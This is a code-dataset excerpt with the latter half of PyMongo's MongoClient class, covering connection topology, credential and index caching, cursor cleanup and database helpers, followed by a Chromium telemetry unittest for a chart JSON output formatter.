self._cache_credentials(creds.source, creds)
self._topology_settings = TopologySettings(
seeds=seeds,
replica_set_name=options.replica_set_name,
pool_class=pool_class,
pool_options=options.pool_options,
monitor_class=monitor_class,
condition_class=condition_class,
local_threshold_ms=options.local_threshold_ms,
server_selection_timeout=options.server_selection_timeout,
heartbeat_frequency=options.heartbeat_frequency)
self._topology = Topology(self._topology_settings)
if connect:
self._topology.open()
def target():
client = self_ref()
if client is None:
return False # Stop the executor.
MongoClient._process_periodic_tasks(client)
return True
executor = periodic_executor.PeriodicExecutor(
interval=common.KILL_CURSOR_FREQUENCY,
min_interval=0.5,
target=target,
name="pymongo_kill_cursors_thread")
# We strongly reference the executor and it weakly references us via
# this closure. When the client is freed, stop the executor soon.
self_ref = weakref.ref(self, executor.close)
self._kill_cursors_executor = executor
executor.open()
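# Illustrative connection patterns (sketch; hosts and credentials are
# placeholders, not defaults):
#   MongoClient()                                          # localhost:27017
#   MongoClient('mongodb://user:pass@db.example.com/mydb') # URI form
#   MongoClient(['h1.example.com:27017', 'h2.example.com:27017'],
#               replicaSet='rs0', w='majority')            # replica set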
def _cache_credentials(self, source, credentials, connect=False):
"""Save a set of authentication credentials.
The credentials are used to login a socket whenever one is created.
If `connect` is True, verify the credentials on the server first.
"""
# Don't let other threads affect this call's data.
all_credentials = self.__all_credentials.copy()
if source in all_credentials:
# Nothing to do if we already have these credentials.
if credentials == all_credentials[source]:
return
raise OperationFailure('Another user is already authenticated '
'to this database. You must logout first.')
if connect:
server = self._get_topology().select_server(
writable_preferred_server_selector)
# get_socket() logs out of the database if logged in with old
# credentials, and logs in with new ones.
with server.get_socket(all_credentials) as sock_info:
sock_info.authenticate(credentials)
# If several threads run _cache_credentials at once, last one wins.
self.__all_credentials[source] = credentials
def _purge_credentials(self, source):
"""Purge credentials from the authentication cache."""
self.__all_credentials.pop(source, None)
def _cached(self, dbname, coll, index):
"""Test if `index` is cached."""
cache = self.__index_cache
now = datetime.datetime.utcnow()
with self.__index_cache_lock:
return (dbname in cache and
coll in cache[dbname] and
index in cache[dbname][coll] and
now < cache[dbname][coll][index])
def _cache_index(self, dbname, collection, index, cache_for):
"""Add an index to the index cache for ensure_index operations."""
now = datetime.datetime.utcnow()
expire = datetime.timedelta(seconds=cache_for) + now
with self.__index_cache_lock:
if dbname not in self.__index_cache:
self.__index_cache[dbname] = {}
self.__index_cache[dbname][collection] = {}
self.__index_cache[dbname][collection][index] = expire
elif collection not in self.__index_cache[dbname]:
self.__index_cache[dbname][collection] = {}
self.__index_cache[dbname][collection][index] = expire
else:
self.__index_cache[dbname][collection][index] = expire
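# Cache layout (sketch): self.__index_cache maps
#   {dbname: {collection_name: {index_name: expiry_datetime}}}
# and _cached() treats an entry as live while utcnow() < its expiry.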
def _purge_index(self, database_name,
collection_name=None, index_name=None):
"""Purge an index from the index cache.
If `index_name` is None purge an entire collection.
If `collection_name` is None purge an entire database.
"""
with self.__index_cache_lock:
if not database_name in self.__index_cache:
return
if collection_name is None:
del self.__index_cache[database_name]
return
if not collection_name in self.__index_cache[database_name]:
return
if index_name is None:
del self.__index_cache[database_name][collection_name]
return
if index_name in self.__index_cache[database_name][collection_name]:
del self.__index_cache[database_name][collection_name][index_name]
def _server_property(self, attr_name):
"""An attribute of the current server's description.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
Not threadsafe if used multiple times in a single method, since
the server may change. In such cases, store a local reference to a
ServerDescription first, then use its properties.
"""
server = self._topology.select_server(
writable_server_selector)
return getattr(server.description, attr_name)
@property
def event_listeners(self):
"""The event listeners registered for this client.
See :mod:`~pymongo.monitoring` for details.
"""
return self._event_listeners.event_listeners
@property
def address(self):
"""(host, port) of the current standalone, primary, or mongos, or None.
Accessing :attr:`address` raises :exc:`~.errors.InvalidOperation` if
the client is load-balancing among mongoses, since there is no single
address. Use :attr:`nodes` instead.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
.. versionadded:: 3.0
"""
topology_type = self._topology._description.topology_type
if topology_type == TOPOLOGY_TYPE.Sharded:
raise InvalidOperation(
'Cannot use "address" property when load balancing among'
' mongoses, use "nodes" instead.')
if topology_type not in (TOPOLOGY_TYPE.ReplicaSetWithPrimary,
TOPOLOGY_TYPE.Single):
return None
return self._server_property('address')
@property
def primary(self):
"""The (host, port) of the current primary of the replica set.
Returns ``None`` if this client is not connected to a replica set,
there is no primary, or this client was created without the
`replicaSet` option.
.. versionadded:: 3.0
MongoClient gained this property in version 3.0 when
MongoReplicaSetClient's functionality was merged in.
"""
return self._topology.get_primary()
@property
def secondaries(self):
"""The secondary members known to this client.
A sequence of (host, port) pairs. Empty if this client is not
connected to a replica set, there are no visible secondaries, or this
client was created without the `replicaSet` option.
.. versionadded:: 3.0
MongoClient gained this property in version 3.0 when
MongoReplicaSetClient's functionality was merged in.
"""
return self._topology.get_secondaries()
@property
def arbiters(self):
"""Arbiters in the replica set.
A sequence of (host, port) pairs. Empty if this client is not
connected to a replica set, there are no arbiters, or this client was
created without the `replicaSet` option.
"""
return self._topology.get_arbiters()
@property
def is_primary(self):
"""If this client is connected to a server that can accept writes.
True if the current server is a standalone, mongos, or the primary of
a replica set. If the client is not connected, this will block until a
connection is established or raise ServerSelectionTimeoutError if no
server is available.
"""
return self._server_property('is_writable')
@property
def is_mongos(self):
"""If this client is connected to mongos. If the client is not
connected, this will block until a connection is established or raise
ServerSelectionTimeoutError if no server is available.
"""
return self._server_property('server_type') == SERVER_TYPE.Mongos
@property
def max_pool_size(self):
"""The maximum allowable number of concurrent connections to each
connected server. Requests to a server will block if there are
`maxPoolSize` outstanding connections to the requested server.
Defaults to 100. Cannot be 0.
When a server's pool has reached `max_pool_size`, operations for that
server block waiting for a socket to be returned to the pool. If
``waitQueueTimeoutMS`` is set, a blocked operation will raise
:exc:`~pymongo.errors.ConnectionFailure` after a timeout.
By default ``waitQueueTimeoutMS`` is not set.
"""
return self.__options.pool_options.max_pool_size
@property
def min_pool_size(self):
"""The minimum required number of concurrent connections that the pool
will maintain to each connected server. Default is 0.
"""
return self.__options.pool_options.min_pool_size
@property
def max_idle_time_ms(self):
"""The maximum number of milliseconds that a connection can remain
idle in the pool before being removed and replaced. Defaults to
`None` (no limit).
"""
return self.__options.pool_options.max_idle_time_ms
@property
def nodes(self):
"""Set of all currently connected servers.
.. warning:: When connected to a replica set the value of :attr:`nodes`
can change over time as :class:`MongoClient`'s view of the replica
set changes. :attr:`nodes` can also be an empty set when
:class:`MongoClient` is first instantiated and hasn't yet connected
to any servers, or a network partition causes it to lose connection
to all servers.
"""
description = self._topology.description
return frozenset(s.address for s in description.known_servers)
@property
def max_bson_size(self):
"""The largest BSON object the connected server accepts in bytes.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
"""
return self._server_property('max_bson_size')
@property
def max_message_size(self):
"""The largest message the connected server accepts in bytes.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
"""
return self._server_property('max_message_size')
@property
def max_write_batch_size(self):
"""The maxWriteBatchSize reported by the server.
If the client is not connected, this will block until a connection is
established or raise ServerSelectionTimeoutError if no server is
available.
Returns a default value when connected to server versions prior to
MongoDB 2.6.
"""
return self._server_property('max_write_batch_size')
@property
def local_threshold_ms(self):
"""The local threshold for this instance."""
return self.__options.local_threshold_ms
@property
def server_selection_timeout(self):
"""The server selection timeout for this instance in seconds."""
return self.__options.server_selection_timeout
def _is_writable(self):
"""Attempt to connect to a writable server, or return False.
"""
topology = self._get_topology() # Starts monitors if necessary.
try:
svr = topology.select_server(writable_server_selector)
# When directly connected to a secondary, arbiter, etc.,
# select_server returns it, whatever the selector. Check
# again if the server is writable.
return svr.description.is_writable
except ConnectionFailure:
return False
def close(self):
"""Disconnect from MongoDB.
Close all sockets in the connection pools and stop the monitor threads.
If this instance is used again it will be automatically re-opened and
the threads restarted.
"""
self._topology.close()
def set_cursor_manager(self, manager_class):
"""DEPRECATED - Set this client's cursor manager.
Raises :class:`TypeError` if `manager_class` is not a subclass of
:class:`~pymongo.cursor_manager.CursorManager`. A cursor manager
handles closing cursors. Different managers can implement different
policies in terms of when to actually kill a cursor that has
been closed.
:Parameters:
- `manager_class`: cursor manager to use
.. versionchanged:: 3.3
Deprecated, for real this time.
.. versionchanged:: 3.0
Undeprecated.
"""
warnings.warn(
"set_cursor_manager is Deprecated",
DeprecationWarning,
stacklevel=2)
manager = manager_class(self)
if not isinstance(manager, CursorManager):
raise TypeError("manager_class must be a subclass of "
"CursorManager")
self.__cursor_manager = manager
def _get_topology(self):
"""Get the internal :class:`~pymongo.topology.Topology` object.
If this client was created with "connect=False", calling _get_topology
launches the connection process in the background.
"""
self._topology.open()
return self._topology
@contextlib.contextmanager
def _get_socket(self, selector):
server = self._get_topology().select_server(selector)
try:
with server.get_socket(self.__all_credentials) as sock_info:
yield sock_info
except NetworkTimeout:
# The socket has been closed. Don't reset the server.
# Server Discovery And Monitoring Spec: "When an application
# operation fails because of any network error besides a socket
# timeout...."
raise
except NotMasterError:
# "When the client sees a "not master" error it MUST replace the
# server's description with type Unknown. It MUST request an
# immediate check of the server."
self._reset_server_and_request_check(server.description.address)
raise
except ConnectionFailure:
# "Client MUST replace the server's description with type Unknown
# ... MUST NOT request an immediate check of the server."
self.__reset_server(server.description.address)
raise
def _socket_for_writes(self):
return self._get_socket(writable_server_selector)
@contextlib.contextmanager
def _socket_for_reads(self, read_preference):
preference = read_preference or ReadPreference.PRIMARY
# Get a socket for a server matching the read preference, and yield
# sock_info, slave_ok. Server Selection Spec: "slaveOK must be sent to
# mongods with topology type Single. If the server type is Mongos,
# follow the rules for passing read preference to mongos, even for
# topology type Single."
# Thread safe: if the type is single it cannot change.
topology = self._get_topology()
single = topology.description.topology_type == TOPOLOGY_TYPE.Single
with self._get_socket(read_preference) as sock_info:
slave_ok = (single and not sock_info.is_mongos) or (
preference != ReadPreference.PRIMARY)
yield sock_info, slave_ok
def _send_message_with_response(self, operation, read_preference=None,
exhaust=False, address=None):
"""Send a message to MongoDB and return a Response.
:Parameters:
- `operation`: a _Query or _GetMore object.
- `read_preference` (optional): A ReadPreference.
- `exhaust` (optional): If True, the socket used stays checked out.
It is returned along with its Pool in the Response.
- `address` (optional): Optional address when sending a message
to a specific server, used for getMore.
"""
with self.__lock:
# If needed, restart kill-cursors thread after a fork.
self._kill_cursors_executor.open()
topology = self._get_topology()
if address:
server = topology.select_server_by_address(address)
if not server:
raise AutoReconnect('server %s:%d no longer available'
% address)
else:
selector = read_preference or writable_server_selector
server = topology.select_server(selector)
# A _Query's slaveOk bit is already set for queries with non-primary
# read preference. If this is a direct connection to a mongod, override
# and *always* set the slaveOk bit. See bullet point 2 in
# server-selection.rst#topology-type-single.
set_slave_ok = (
topology.description.topology_type == TOPOLOGY_TYPE.Single
and server.description.server_type != SERVER_TYPE.Mongos)
return self._reset_on_error(
server,
server.send_message_with_response,
operation,
set_slave_ok,
self.__all_credentials,
self._event_listeners,
exhaust)
def _reset_on_error(self, server, func, *args, **kwargs):
"""Execute an operation. Reset the server on network error.
Returns fn()'s return value on success. On error, clears the server's
pool and marks the server Unknown.
Re-raises any exception thrown by fn().
"""
try:
return func(*args, **kwargs)
except NetworkTimeout:
# The socket has been closed. Don't reset the server.
raise
except ConnectionFailure:
self.__reset_server(server.description.address)
raise
def __reset_server(self, address):
"""Clear our connection pool for a server and mark it Unknown."""
self._topology.reset_server(address)
def _reset_server_and_request_check(self, address):
"""Clear our pool for a server, mark it Unknown, and check it soon."""
self._topology.reset_server_and_request_check(address)
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.address == other.address
return NotImplemented
def __ne__(self, other):
return not self == other
def _repr_helper(self):
def option_repr(option, value):
"""Fix options whose __repr__ isn't usable in a constructor."""
if option == 'document_class':
if value is dict:
return 'document_class=dict'
else:
return 'document_class=%s.%s' % (value.__module__,
value.__name__)
if option in common.TIMEOUT_VALIDATORS and value is not None:
return "%s=%s" % (option, int(value * 1000))
return '%s=%r' % (option, value)
# Host first...
options = ['host=%r' % [
'%s:%d' % (host, port)
for host, port in self._topology_settings.seeds]]
# ... then everything in self._constructor_args...
options.extend(
option_repr(key, self.__options._options[key])
for key in self._constructor_args)
# ... then everything else.
options.extend(
option_repr(key, self.__options._options[key])
for key in self.__options._options
if key not in set(self._constructor_args))
return ', '.join(options)
def __repr__(self):
return ("MongoClient(%s)" % (self._repr_helper(),))
def __getattr__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
if name.startswith('_'):
raise AttributeError(
"MongoClient has no attribute %r. To access the %s"
" database, use client[%r]." % (name, name, name))
return self.__getitem__(name)
def __getitem__(self, name):
"""Get a database by name.
Raises :class:`~pymongo.errors.InvalidName` if an invalid
database name is used.
:Parameters:
- `name`: the name of the database to get
"""
return database.Database(self, name)
def close_cursor(self, cursor_id, address=None):
"""Send a kill cursors message soon with the given id.
Raises :class:`TypeError` if `cursor_id` is not an instance of
``(int, long)``. What closing the cursor actually means
depends on this client's cursor manager.
This method may be called from a :class:`~pymongo.cursor.Cursor`
destructor during garbage collection, so it isn't safe to take a
lock or do network I/O. Instead, we schedule the cursor to be closed
soon on a background thread.
:Parameters:
- `cursor_id`: id of cursor to close
- `address` (optional): (host, port) pair of the cursor's server.
If it is not provided, the client attempts to close the cursor on
the primary or standalone, or a mongos server.
.. versionchanged:: 3.0
Added ``address`` parameter.
"""
if not isinstance(cursor_id, integer_types):
raise TypeError("cursor_id must be an instance of (int, long)")
if self.__cursor_manager is not None:
self.__cursor_manager.close(cursor_id, address)
else:
self.__kill_cursors_queue.append((address, [cursor_id]))
def kill_cursors(self, cursor_ids, address=None):
"""DEPRECATED - Send a kill cursors message soon with the given ids.
Raises :class:`TypeError` if `cursor_ids` is not an instance of
``list``.
:Parameters:
- `cursor_ids`: list of cursor ids to kill
- `address` (optional): (host, port) pair of the cursor's server.
If it is not provided, the client attempts to close the cursor on
the primary or standalone, or a mongos server.
.. versionchanged:: 3.3
Deprecated.
.. versionchanged:: 3.0
Now accepts an `address` argument. Schedules the cursors to be
closed on a background thread instead of sending the message
immediately.
"""
warnings.warn(
"kill_cursors is deprecated.",
DeprecationWarning,
stacklevel=2)
if not isinstance(cursor_ids, list):
raise TypeError("cursor_ids must be a list")
# "Atomic", needs no lock.
self.__kill_cursors_queue.append((address, cursor_ids))
# This method is run periodically by a background thread.
def _process_periodic_tasks(self):
"""Process any pending kill cursors requests and
maintain connection pool parameters."""
address_to_cursor_ids = defaultdict(list)
# Other threads or the GC may append to the queue concurrently.
while True:
try:
address, cursor_ids = self.__kill_cursors_queue.pop()
except IndexError:
break
address_to_cursor_ids[address].extend(cursor_ids)
# Don't re-open topology if it's closed and there's no pending cursors.
if address_to_cursor_ids:
listeners = self._event_listeners
publish = listeners.enabled_for_commands
topology = self._get_topology()
for address, cursor_ids in address_to_cursor_ids.items():
try:
if address:
# address could be a tuple or _CursorAddress, but
# select_server_by_address needs (host, port).
server = topology.select_server_by_address(
tuple(address))
else:
# Application called close_cursor() with no address.
server = topology.select_server(
writable_server_selector)
try:
namespace = address.namespace
db, coll = namespace.split('.', 1)
except AttributeError:
namespace = None
db = coll = "OP_KILL_CURSORS"
spec = SON([('killCursors', coll),
('cursors', cursor_ids)])
with server.get_socket(self.__all_credentials) as sock_info:
if (sock_info.max_wire_version >= 4 and
namespace is not None):
sock_info.command(db, spec)
else:
if publish:
start = datetime.datetime.now()
request_id, msg = message.kill_cursors(cursor_ids)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
spec, db, request_id, address)
start = datetime.datetime.now()
try:
sock_info.send_message(msg, 0)
except Exception as exc:
if publish:
dur = ((datetime.datetime.now() - start)
+ duration)
listeners.publish_command_failure(
dur, message._convert_exception(exc),
'killCursors', request_id, address)
raise
if publish:
duration = ((datetime.datetime.now() - start)
+ duration)
# OP_KILL_CURSORS returns no reply, fake one.
reply = {'cursorsUnknown': cursor_ids, 'ok': 1}
listeners.publish_command_success(
duration, reply, 'killCursors', request_id,
address)
except Exception:
helpers._handle_exception()
try:
self._topology.update_pool()
except Exception:
helpers._handle_exception()
def server_info(self):
"""Get information about the MongoDB server we're connected to."""
return self.admin.command("buildinfo",
read_preference=ReadPreference.PRIMARY)
def database_names(self):
"""Get a list of the names of all databases on the connected server."""
return [db["name"] for db in
self._database_default_options('admin').command(
"listDatabases")["databases"]]
def drop_database(self, name_or_database):
"""Drop a database.
Raises :class:`TypeError` if `name_or_database` is not an instance of
:class:`basestring` (:class:`str` in python 3) or
:class:`~pymongo.database.Database`.
:Parameters:
- `name_or_database`: the name of a database to drop, or a
:class:`~pymongo.database.Database` instance representing the
database to drop
"""
name = name_or_database
if isinstance(name, database.Database):
name = name.name
if not isinstance(name, string_type):
raise TypeError("name_or_database must be an instance "
"of %s or a Database" % (string_type.__name__,))
self._purge_index(name)
self[name].command("dropDatabase",
read_preference=ReadPreference.PRIMARY)
def get_default_database(self):
"""Get the database named in the MongoDB connection URI.
>>> uri = 'mongodb://host/my_database'
>>> client = MongoClient(uri)
>>> db = client.get_default_database()
>>> assert db.name == 'my_database'
Useful in scripts where you want to choose which database to use
based only on the URI in a configuration file.
"""
if self.__default_database_name is None:
raise ConfigurationError('No default database defined')
return self[self.__default_database_name]
def get_database(self, name, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a :class:`~pymongo.database.Database` with the given name and
options.
Useful for creating a :class:`~pymongo.database.Database` with
different codec options, read preference, and/or write concern from
this :class:`MongoClient`.
>>> client.read_preference
Primary()
>>> db1 = client.test
>>> db1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> db2 = client.get_database(
... 'test', read_preference=ReadPreference.SECONDARY)
>>> db2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `name`: The name of the database - a string.
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`MongoClient` is
used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`MongoClient` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`MongoClient` is
used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`MongoClient` is
used.
"""
return database.Database(
self, name, codec_options, read_preference,
write_concern, read_concern)
def _database_default_options(self, name):
"""Get a Database instance with the default settings."""
return self.get_database(
name, codec_options=DEFAULT_CODEC_OPTIONS,
read_preference=ReadPreference.PRIMARY,
write_concern=WriteConcern())
@property
def is_locked(self):
"""Is this server locked? While locked, all write operations
are blocked, although read operations may still be allowed.
Use :meth:`unlock` to unlock.
"""
ops = self._database_default_options('admin').current_op()
return bool(ops.get('fsyncLock', 0))
def fsync(self, **kwargs):
"""Flush all pending writes to datafiles.
:Parameters:
Optional parameters can be passed as keyword arguments:
- `lock`: If True lock the server to disallow writes.
- `async`: If True don't block while synchronizing.
.. warning:: `async` and `lock` cannot be used together.
.. warning:: MongoDB does not support the `async` option
on Windows and will raise an exception on that
platform.
"""
self.admin.command("fsync",
read_preference=ReadPreference.PRIMARY, **kwargs)
def unlock(self):
"""Unlock a previously locked server.
"""
cmd = {"fsyncUnlock": 1}
with self._socket_for_writes() as sock_info:
if sock_info.max_wire_version >= 4:
try:
sock_info.command("admin", cmd)
except OperationFailure as exc:
# Ignore "DB not locked" to replicate old behavior
if exc.code != 125:
raise
else:
helpers._first_batch(sock_info, "admin", "$cmd.sys.unlock",
{}, -1, True, self.codec_options,
ReadPreference.PRIMARY, cmd, self._event_listeners)
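# Usage sketch (assumes a server where fsyncLock is permitted):
#   client.fsync(lock=True)       # block writes
#   try:
#       assert client.is_locked
#       # ... e.g. snapshot data files ...
#   finally:
#       client.unlock()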
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
def __iter__(self):
return self
def __next__(self):
raise TypeError("'MongoClient' object is not iterable")
next = __next__
| gpl-3.0 |
Plain-Andy-legacy/android_external_chromium_org | tools/telemetry/telemetry/results/chart_json_output_formatter_unittest.py | 27 | 5330 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import StringIO
import unittest
from telemetry import benchmark
from telemetry.results import chart_json_output_formatter
from telemetry.results import page_test_results
from telemetry.page import page_set
from telemetry.value import scalar
from telemetry.value import list_of_scalar_values
def _MakePageSet():
ps = page_set.PageSet(file_path=os.path.dirname(__file__))
ps.AddPageWithDefaultRunNavigate('http://www.foo.com/')
ps.AddPageWithDefaultRunNavigate('http://www.bar.com/')
return ps
class ChartJsonTest(unittest.TestCase):
def setUp(self):
self._output = StringIO.StringIO()
self._page_set = _MakePageSet()
self._benchmark_metadata = benchmark.BenchmarkMetadata('benchmark_name')
self._formatter = chart_json_output_formatter.ChartJsonOutputFormatter(
self._output, self._benchmark_metadata)
def testOutputAndParse(self):
results = page_test_results.PageTestResults()
self._output.truncate(0)
results.WillRunPage(self._page_set[0])
v0 = scalar.ScalarValue(results.current_page, 'foo', 'seconds', 3)
results.AddValue(v0)
results.DidRunPage(self._page_set[0])
self._formatter.Format(results)
d = json.loads(self._output.getvalue())
self.assertIn('foo', d['charts'])
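# For reference (sketch), the parsed chart-JSON has roughly this shape:
#   {'format_version': '0.1',
#    'benchmark_name': 'benchmark_name',
#    'charts': {'foo': {'http://www.foo.com/': {...}}}}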
def testAsChartDictSerializable(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
page_specific_values = [v0]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
json.dumps(d)
def testAsChartDictBaseKeys(self):
page_specific_values = []
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertEquals(d['format_version'], '0.1')
self.assertEquals(d['benchmark_name'], 'benchmark_name')
def testAsChartDictPageSpecificValuesSamePage(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
def testAsChartDictPageSpecificValuesAndComputedSummaryWithTraceName(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo.bar', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[1], 'foo.bar', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
self.assertTrue('http://www.bar.com/' in d['charts']['foo'])
self.assertTrue('bar' in d['charts']['foo'])
def testAsChartDictPageSpecificValuesAndComputedSummaryWithoutTraceName(self):
v0 = scalar.ScalarValue(self._page_set[0], 'foo', 'seconds', 3)
v1 = scalar.ScalarValue(self._page_set[1], 'foo', 'seconds', 4)
page_specific_values = [v0, v1]
summary_values = []
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('foo' in d['charts'])
self.assertTrue('http://www.foo.com/' in d['charts']['foo'])
self.assertTrue('http://www.bar.com/' in d['charts']['foo'])
self.assertTrue('summary' in d['charts']['foo'])
def testAsChartDictSummaryValueWithTraceName(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo.bar', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('bar' in d['charts']['foo'])
def testAsChartDictSummaryValueWithoutTraceName(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertTrue('summary' in d['charts']['foo'])
def testAsChartDictValueSmokeTest(self):
v0 = list_of_scalar_values.ListOfScalarValues(None, 'foo.bar', 'seconds',
[3, 4])
page_specific_values = []
summary_values = [v0]
d = chart_json_output_formatter._ResultsAsChartDict( # pylint: disable=W0212
self._benchmark_metadata,
page_specific_values,
summary_values)
self.assertEquals(d['charts']['foo']['bar']['values'], [3, 4])
| bsd-3-clause |